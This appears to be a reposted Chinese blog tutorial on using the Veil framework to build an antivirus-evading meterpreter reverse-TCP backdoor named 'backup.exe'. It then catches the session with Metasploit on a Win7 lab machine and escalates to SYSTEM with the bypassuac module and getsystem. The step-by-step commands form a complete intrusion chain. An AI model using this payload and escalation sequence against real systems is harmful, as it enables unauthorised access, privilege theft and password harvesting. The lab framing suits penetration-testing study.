我是靠谱客的博主 傲娇镜子,最近开发中收集的这篇文章主要介绍免杀Payload生成工具Veil的下载与使用免杀Payload生成工具Veil的下载与使用下载Veilveil 生成免杀 payload使用 payload 进行渗透攻击结合 msf 的 bypassuac模块提权,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

免杀Payload生成工具Veil的下载与使用

Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件

————
————

下载Veil

kali 中输入指令 apt-get install veil 下载 veil(需要挺久)
请添加图片描述

下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。
请添加图片描述

我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。
请添加图片描述

重启服务之后我尝试输入 veil 看有没有装好,又让我确认是否安装。(前面执行了下载的指令难道只是在升级某些库)
输入 y 确定 (又需要挺久)
请添加图片描述

不停地下载,等过程结束,弹出这个,让我安装 python3,应该是下载veil必走过程,后面还有两个模块。
请添加图片描述

默认一直next
请添加图片描述

next
请添加图片描述

finish
请添加图片描述

然后弹出界面要求安装pywin32-218模块
请添加图片描述

默认下一步
请添加图片描述

下一步
请添加图片描述

结束
请添加图片描述

弹出界面提示需要安装pycrypto-2.6模块
请添加图片描述

下一步
请添加图片描述

next
请添加图片描述

上面的等待下载过了很久很久,包含但不仅限于上面几个东西,可能是我的kali有些问题,过程中安装了比较多的东西。
结束后输入 veil 回显如图,即安装成功。
可以看到, veil 自带两个 tools 。并且后面还给出了可用的命令:

exit ——退出veil
info ——工具信息
list —— 列出可用的工具
options —— 显示veil配置
update ——更新veil
use ——使用某个 tool

请添加图片描述

————
————

veil 生成免杀 payload

接下来就开始使用veil 生成免杀 payload
使用第一个tool:

use 1

看到装载了41个 payloads
请添加图片描述

list 可查看这 41个payload 分别是是什么。
请添加图片描述

这里尝试使用第7个:c/meterpreter/rev_tcp.py

use 7

给出了一些需要配置的选项,还有可用命令。
请添加图片描述

设置 LHOST为本地 kali 的IP:

set LHOST 192.168.43.125

options再次查看配置信息,可以看到 lhost 已经配置好了。lport端口默认4444,无需配置。
请添加图片描述

输入 generate 执行payload ,显示让我们 给命令中指定一个文件名:backup(自己设定)
请添加图片描述

可以看到生成了 可执行文件backup.exe
请添加图片描述

在文件中找到可执行文件: /var/lib/veil/output/compiled/backup.exe
请添加图片描述

我尝试把这个 exe 后门文件拿出来,但是在win10里马上就被查杀了,然后放进装了360的win7里也会被查杀。(貌似这免杀不够强啊)

————
————

使用 payload 进行渗透攻击

虽然生成的后门文件无法免杀,但这里还是结合 msf 测试一下进行攻击。
靶机:win7
打开 msf ,使用 handler模块

use exploit/multi/handler

请添加图片描述

也给出了 payload :generic/shell_reverse_tcp

set payload windows/meterpreter/reverse_tcp

然后 options 查看配置项,设置 LHOST :

set LHOST 192.168.43.125

请添加图片描述

启动渗透攻击: exploit
然后我把那个后门文件 backup.exe 放在 win7靶机上,添加信任不被免杀,并运行 backup.exe ,然后回到kali ,就可以看到下图中所示信息, 打开了一个Meterpreter会话。
请添加图片描述

执行 shell 命令,可以看到进入了 win7 的命令行操作下,并看到win7用户名 Goodric 。
请添加图片描述

exit 退出命令行模式,getuid 查看当前权限为普通用户权限。要进行更深入的操作,还要进行提权。
请添加图片描述

————
————

结合 msf 的 bypassuac模块提权

这里测试用Metasploit中的bypassuac模块绕过UAC(用户访问控制),提升用户权限。
Metasploit的一些简单使用在之前写过:利用虚拟机复现漏洞 “永恒之蓝”

先把前面正在运行的handler模块放在后台:

background

回显提示在 session 1

也可以查看后台运行的会话:

sessions

请添加图片描述

使用bypassuac模块,并查看可配置的选项参数:

use exploit/windows/local/bypassuac

options
设置SESSION选项参数:

set session 1

请添加图片描述

exploit 启动渗透攻击
可以看到又进入了一个 meterpreter 会话。
请添加图片描述

getuid 查看当前权限为普通用户,getsystem 获取系统权限(最高权限),成功,再次 getuid 查看当前权限显示为 system 系统权限。
系统权限之后就可以进行各种操作了,获取密码等待。
请添加图片描述

最后

以上就是傲娇镜子为你收集整理的免杀Payload生成工具Veil的下载与使用免杀Payload生成工具Veil的下载与使用下载Veilveil 生成免杀 payload使用 payload 进行渗透攻击结合 msf 的 bypassuac模块提权的全部内容,希望文章能够帮你解决免杀Payload生成工具Veil的下载与使用免杀Payload生成工具Veil的下载与使用下载Veilveil 生成免杀 payload使用 payload 进行渗透攻击结合 msf 的 bypassuac模块提权所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(39)

评论列表共有 0 条评论

立即
投稿
返回
顶部